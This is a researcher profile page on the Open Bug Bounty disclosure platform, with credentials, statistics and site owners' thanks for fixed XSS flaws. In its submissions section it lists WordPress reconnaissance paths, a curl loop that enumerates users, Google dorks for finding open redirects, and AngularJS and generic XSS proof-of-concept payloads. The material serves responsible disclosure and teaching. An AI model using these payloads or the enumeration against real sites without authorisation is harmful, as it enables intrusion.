Infosec Institute

Open Bug Bounty mentioned in the
Top 6 Bug Bounty programs of
2022 by the InfoSec Institute

The Hacker News

Open Bug Bounty named among the
Top 5 Bug Bounty programs of 2021
by The Hacker News

Platform update: please use our new authentication mechanism to securely use the Open Bug Bounty Platform.
For security researchers
Report a Vulnerability
Submit, help fixing, get kudos.
For website owners
Start a Bug Bounty
Run your bounty program for free.
1,708,329 coordinated disclosures
1,357,588 fixed vulnerabilities
1,980 bug bounty programs, 3,897 websites
46,064 researchers, 1,643 honor badges

MiguelSantareno | Security Researcher Profile


Security researcher MiguelSantareno has already helped fix 1142 vulnerabilities.



Researcher reputation:  240

Real name:
Miguel Santareno

About me:
Public work and profiles:

https://miguelsantareno.github.io/

https://hackerone.com/miguel_santareno

https://www.intigriti.com/profile/miguelsantareno

https://yeswehack.com/hunters/miguelsantareno

https://bugcrowd.com/MiguelSantareno

Contact email:
m1ke460 at hotmail dot com

Alternative Contacts:
https://twitter.com/MiguelSantareno

https://www.linkedin.com/in/miguelsantareno

Certifications & Diplomas:
eCPPT
eWPT
CSIL-CDWI
CSIL-COA
CEH
CPTE

CVE-2022-23377
CVE-2022-23865

Experience in Application Security
1-3 years

Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.

Halls of Fame:
Ericsson
Oracle
Cisco
EC-Council
ASUS
Atos
SAP
Nokia
Hitachi
SonicWall
Siemens
Microsoft
United Nations
Trend Micro
BMW
AT&T
CERT-EU
etc...

Follow me on:
Twitter
LinkedIn

Ethics and Rules:
Miguel Santareno is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.

Recommendations and Acknowledgements | Full List:

@TiagoGuedesEGo1     3 January, 2022
    Twitter TiagoGuedesEGo1 Tiago Guedes from E-goi:
Miguel Santareno made us aware of several security vulnerabilities across several sections of our platform needed to be rectified due to them being a security risk.

It was a pleasure working with him and I hope we can work again in the future, Thank you!
@bmpbraga     16 March, 2020
    Twitter bmpbraga Bruno from Weasy:
Thanks to Miguel that reported a XSS vulnerability in one of our websites.
Excellent service.

The problem is now solved and tested.
Great help, Many thanks
@PaulMar23292621     20 January, 2020
    Twitter PaulMar23292621 Martin from A1 Telekom Austria:
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel!
@uniteddomains     17 January, 2020
    Twitter uniteddomains Lubos from united-domains AG:
Miguel helped us to identify several bugs in our wordpress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much!
@NeneLand     2 January, 2020
    Twitter NeneLand Lorenzo Zotano from Giants Gaming:
Miguel found a important security issue in our webpage and send us very good information about solutions. Thanks a lot.
@FeroxHosting     30 December, 2019
    Twitter FeroxHosting Luc from Ferox Hosting:
Miguel found a issue in our wordpress site and was quick to report it. Thank you
@DragonSGA     17 July, 2018
    Twitter DragonSGA Stefan from Cadenas:
Miguel has found a XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
@Lewisdh47     15 May, 2018
    Twitter Lewisdh47 Dave from Avis:
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
@bubblegate     9 May, 2018
    Twitter bubblegate James Murrells from Bubblegate:
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
@pmiguelr75     26 September, 2017
    Twitter pmiguelr75 Pedro Rodrigues from Bluesoft:
Identified an XSS vulnerability in one website and show us where is it.
After that made changes in code to solve it
All solved.
Great help, great support.
@thenrique     22 September, 2017
    Twitter thenrique Tulio from Spirit Fanfics:
dentified an XSS vulnerability in our website and provided all the details in order to solve it. Very friendly. Thanks
@jonnyowls     22 September, 2017
    Twitter jonnyowls Jonathan from C5:
Miguel reported a XSS vulnerability in our website, it was remediated and retested very quickly. Excellent service
@maswb19     1 September, 2017
    Twitter maswb19 Jay from PSA:
Helpfully notified us of an XSS vulnerability in one of our sites with the details we needed to replicate it and responded quickly to emails.
@tgljamesuk     10 August, 2017
    Twitter tgljamesuk James from The Graphics Line:
Miguel identified an XSS vulnerability one of our websites, provided a step by step guide to reproduce the issue along with information on how to resolve it. He also re-tested after we applied a patch. Thank you Miguel!
@ISOatUO     27 July, 2017
    Twitter ISOatUO Information Security Office from University of Otago:
Provided a simple proof of concept, allowing us to identify the cause easily and deploy a fix quickly.
@kovyrin     26 July, 2017
    Twitter kovyrin Oleksiy Kovyrin from Swiftype Inc:
Miguel has identified an XSS vulnerability on our website, provided us with necessary details to reproduce the issue and was very helpful re-testing after we applied the fixes. Thank you.
@dwig     22 July, 2017
    Twitter dwig David Dwiggins from Historic New England:
Identified XSS vulnerability in code from a contractor, and promptly provided details to allow us to fix. Great to work with!
@tugamars     12 July, 2017
    Twitter tugamars Marcelo Silva from Defs:
Identified an XSS vulnerability in our website and provided all the details in order to solve it. Very friendly. Thanks
@hual07     11 July, 2017
    Twitter hual07 Alexander H. from alengo:
Provided all details of a XSS vulnerability on our website - very friendly, super correct! THX
@aaronbrighton     5 July, 2017
    Twitter aaronbrighton Aaron from Destiny:
Identified a XSS vulnerability in our website, provided us the details in a timely manner allowing us to correct the issue. Thank you

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Secured Websites Badge
50+ Secured Websites Badge
500+ Secured Websites Badge
Web Security Veteran Badge
10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser Badge
CSRF Master Badge
AppSec Logic Master Badge
Fastest Fix Badge
WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB Badge
OBB Advocate Badge
Improved OBB Badge
Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master Badge
Patch Guru Badge
Patch Lord Badge
Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE Badge
FAMOUS Badge
GLOBALLY TRUSTED Badge
REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

Distinguished Blog Author Badge
Distinguished Blog Author Badge
Distinguished Blog Author Badge
1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:1450
Total reports on VIP sites:97
Total patched vulnerabilities:1142
Recommendations received:20
Active since:20.06.2017

Open Bug Bounty Certificate


Researcher Certificate

Reported Vulnerabilities

All Submissions VIP Submissions


05.09.2019  Wordpress basic auditing

Wordpress Read me
target/readme.html

Wordpress License with wordpress version
target/license.txt

Wordpress sample config:
target/wp-config-sample.php

Wordpress installation:
target/wp-admin/install.php

Wordpress upgrade file:
target/wp-admin/upgrade.php

Wordpress setup config:
target/wp-admin/setup-config.php

Wordpress Api usefull paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - wordpress api

Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z-.]|Location:." | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt

Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt

05.09.2019  Payloads for all type off web attacks

02.04.2019  Google Dorks to find open redirects:

inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https

02.04.2019  Cross Site Script angular payloads:

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

30.03.2019  List off basic Cross site script playloads

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

  Latest Patched

 28.03.2024 jarchi.me
 28.03.2024 auctionbidding.fcc.gov
 28.03.2024 moodle.wns.gov.il
 28.03.2024 th.adi.gov.il
 28.03.2024 montague-ma.gov
 28.03.2024 aparecida.sp.gov.br
 27.03.2024 nccupress.nccu.edu.tw
 26.03.2024 schedule.cc.nih.gov
 26.03.2024 floraargentina.edu.ar

  Latest Blog Posts

04.12.2023 by BAx99x
Unmasking the Power of Cross-Site Scripting (XSS): Types, Exploitation, Detection, and Tools
04.12.2023 by a13h1_
$1120: ATO Bug in Twitter’s
04.12.2023 by ClumsyLulz
How I found a Zero Day in W3 Schools
04.12.2023 by 24bkdoor
Hack the Web like a Pirate: Identifying Vulnerabilities with Style
04.12.2023 by 24bkdoor
Navigating the Bounty Seas with Open Bug Bounty

  Recent Recommendations

    20 March, 2024
    TechVitaverdura:
Great exchanges with this person, thank you for your help and your report
    20 March, 2024
    Mek:
He reported some vulnerabilities and oversights of security best practices on my small private project web page.
Was responsive to e-mail, unlike many other people, so yes, I can recommend him.
    20 March, 2024
    ztwo79:
We would like to thank Pooja for responsibly disclosing a Cross-Site Scripting (XSS) vulnerability in our website. Her prompt reporting and assistance in developing a fix were instrumental in ensuring the security of our users.
    16 March, 2024
    TorutheRedFox:
Thanks for the help with the XSS vulnerability. It was a quick fix.
    15 March, 2024
    adesignguy:
Reported an XSS vulnerability which was helpful and much appreciated. I have patched it now as soon as I saw the email which was forwarded onto me!